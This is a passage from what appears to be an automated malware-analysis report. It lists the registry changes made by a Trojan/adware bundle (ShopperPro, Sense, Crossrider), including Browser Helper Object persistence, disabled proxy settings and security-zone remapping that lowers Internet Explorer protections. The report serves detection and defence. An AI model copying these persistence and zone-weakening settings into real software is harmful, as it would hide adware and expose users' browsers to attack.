[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"NoExplore" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process 9ba9693.exe:2936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\InstalledBrowserExtensions\20891\Status]
"Installed" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\InstalledBrowserExtensions\20891]
"70299" = "SensePlus.V2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\InstalledBrowserExtensions\20891\Status]
"Installed" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "95 49 E8 5C 24 5A AF C2 90 C5 5D 67 43 06 86 68"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\InstalledBrowserExtensions\20891]
"70299" = "SensePlus.V2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"25213.bat" = "25213"

The Trojan modifies IE settings for security zones to map all local web nodes that have no dots in their names and do not belong to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process ins_shopperpro.:540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 79 0F 83 62 A2 08 D7 68 E5 16 D1 16 8F 82 2B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process Vxsysrohsgnosa.exe:3856 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"CrPublisherId" = "20891"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 25 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"CrAppId" = "70299"

[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"

[HKLM\SOFTWARE\InstalledBrowserExtensions\20891\Status]
"Installed" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\InstalledBrowserExtensions\20891\Status]
"Installed" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Crossrider]
"Verifier" = "34c14ee3961e02fd387be62f2fca6484"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\InstalledBrowserExtensions\20891]
"70299" = "Sense"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"UninstallString" = "%Program Files%\Sense\Uninstall.exe /fcp=1"

[HKLM\SOFTWARE\Crossrider]
"Bic" = "27f49072ae5d263f87bcaf276b0be0c9IE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"DisplayName" = "Sense"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Crossrider]
"Bic" = "27f49072ae5d263f87bcaf276b0be0c9IE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B3 14 20 D0 35 17 CD EB E9 3C 88 63 A6 1A 00 E9"

[HKLM\SOFTWARE\Crossrider]
"Verifier" = "34c14ee3961e02fd387be62f2fca6484"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\InstalledBrowserExtensions\20891]
"70299" = "Sense"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"DisplayIcon" = "%Program Files%\Sense\utils.exe"

[HKCU\Software\InstalledBrowserExtensions\Sense ]
"70299" = "Sense"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"Publisher" = "Sense "

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"DisplayVersion" = "1.36.01.22"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web nodes that have no dots in their names and do not belong to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Tempo]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process regsvr32.exe:3680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\InprocServer32]
"(Default)" = "%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro.dll"

[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\TypeLib]
"(Default)" = "{8FB1A663-2820-468B-95C4-5060A4C5F413}"

[HKCR\ShopperPro.ShopperProBHO\CurVer]
"(Default)" = "ShopperPro.ShopperProBHO.1"

[HKCR\AppID\{58FDA6AF-67D8-4198-B7CD-94B17532C8D5}]
"(Default)" = "ShopperPro"

[HKCR\AppID\ShopperPro.DLL]
"AppID" = "{58FDA6AF-67D8-4198-B7CD-94B17532C8D5}"

[HKCR\ShopperPro.ShopperProBHO]
"(Default)" = "Shopper Pro"

[HKCR\ShopperPro.ShopperProBHO.1\CLSID]
"(Default)" = "{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}"

[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\ProgID]
"(Default)" = "ShopperPro.ShopperProBHO.1"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"(Default)" = "Shopper Pro"

[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\TypeLib]
"Version" = "1.0"

[HKCR\ShopperPro.ShopperProBHO\CLSID]
"(Default)" = "{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}"

[HKCR\ShopperPro.ShopperProBHO.1]
"(Default)" = "Shopper Pro"

[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0\HELPDIR]
"(Default)" = "%Documents and Settings%\All Users\Application Data\ShopperPro"

[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0]
"(Default)" = "ShopperPro 1.0 Type Library"

[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F 02 BF A3 83 FB 38 8C CB 60 C5 3E A6 06 9C 34"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\VersionIndependentProgID]
"(Default)" = "ShopperPro.ShopperProBHO"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0\0\win32]
"(Default)" = "%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro.dll"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\TypeLib]
"(Default)" = "{8FB1A663-2820-468B-95C4-5060A4C5F413}"

[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}]
"(Default)" = "IShopperProBHO"

[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"(Default)" = "ShopperProBHO"

"NoExplorer" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]

The process ping.exe:4080 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E0 BE 71 0A 47 F7 FC BC E2 B0 7D 18 0C DF 10 31"

The process ping.exe:3592 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "44 00 B1 F5 8F B1 0D A6 4C 61 58 0F CF AF 64 7A"

The process ping.exe:3920 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 49 BF 55 80 1B 25 06 EF FD C7 0A EC C9 6A FA"

The process ping.exe:3900 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF 32 46 96 3D F6 E5 F3 3B 87 C5 00 7B 13 B4 D1"

The process ping.exe:3776 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF C4 C7 9A 9D B5 B7 AB 77 F5 42 CE 2B 50 97 87"

The process ping.exe:2296 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 AE 8B 5E DD 89 0F 09 50 76 71 47 94 4F 25 F1"

The process ping.exe:4016 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CB 7D 28 B2 1D 0D 81 05 DC 04 5E 77 CF C8 5A 37"

The process ping.exe:2472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD 5D 15 48 7F 42 F3 0C 50 E6 97 E1 D7 D8 D2 50"

The process ping.exe:3672 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B9 33 58 F5 53 5B 94 4B 2E 9F 6E 8D 4B A5 70 B2"

The process ping.exe:3148 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D1 ED F6 7C F8 C5 45 75 B7 E0 E4 20 BA 16 93 20"

The process ping.exe:2960 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 29 FD 0D C7 44 5C 14 BC 5A 49 A7 61 4E 58 53"

The process ping.exe:4008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 6A D5 45 3C BE 3D E3 B9 0B F8 0E 7B 30 D6 BB"

The process ping.exe:1544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 B1 DF 15 13 9E C5 F1 E4 7F B5 21 23 2C 42 8E"

The process ping.exe:1540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 70 6F 48 D1 C9 05 A4 98 95 75 5E D7 EA A0 21"

The process ping.exe:3364 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C 78 22 5C A8 E6 79 06 52 4C 1F 43 07 29 0A 2E"

The process ping.exe:3692 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 D9 68 DC EC F9 35 F9 E7 DD 82 B4 DD 2E 4B D3"

The process ping.exe:1652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 C3 7D 99 02 93 3B 00 78 90 B1 7F 11 09 B7 39"

The process ping.exe:548 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 2F 53 DE 07 60 51 C4 EB F5 1D E2 65 B1 19 4B"

The process ping.exe:2240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 E7 81 1D 8E C0 B4 A4 31 41 A2 20 FB 06 BC DB"

The process ping.exe:4044 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC A0 4C 36 63 88 11 D8 0D 4D C3 AD D4 B7 74 7C"

The process ping.exe:3452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A 68 C4 8A F3 8C 1C 1B 07 79 6A 4F FC BD 0A F2"

The process ping.exe:3600 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 7C ED 32 21 72 00 70 3B 72 17 43 D9 2C 6A E4"

The process ping.exe:2460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "69 59 B5 C4 DD 57 D0 77 B7 B0 A3 CC 8C 8B 18 83"

The process ping.exe:3912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 90 56 37 13 82 DD F5 CB 8D 9F A5 E2 C5 3B 6C"

The process ping.exe:2284 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 BE 8E 03 73 87 74 16 4F 4B 32 3D D1 3C 90 D2"

The process ping.exe:3136 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC 8B 26 91 6B 2E E1 F9 DC 4B 3B 55 29 14 F1 F8"

The process ping.exe:4036 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 AB 34 15 F1 8A D1 B5 F4 C6 36 84 56 A4 67 7F"

The process ping.exe:2972 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "89 75 8C DF AC C5 C7 8B 1F DA 01 FA FC 49 2E B4"

The process ping.exe:3312 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 68 3E AC 06 91 F0 7E 53 EA F6 84 5B 41 FF 7A"

The process ping.exe:3884 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 83 B9 F1 1A A5 09 A8 66 41 B0 77 A4 21 C7 60"

The process ping.exe:3784 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 00 11 F3 37 30 B7 7B ED 78 C0 E4 1D 7D 38 EA"

The process ping.exe:3460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 26 79 C3 DA 86 A8 AD B7 DB E5 6F B6 9E B0 8B"

The process ping.exe:2232 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 6B 70 A1 23 B3 EF 0F A3 0A 26 5D D8 52 04 C7"

The process ping.exe:3372 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 E4 E5 A5 12 C4 5E 70 D2 AB 56 DA 8C B9 C8 1C"

The process ping.exe:4072 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "65 7D 09 EF CC D1 22 93 FC 27 36 ED B4 14 49 65"

The process net.exe:3368 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A FC 75 4D D9 B9 31 0C 2A 98 44 38 FC 5B 2B CE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The process net.exe:2624 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
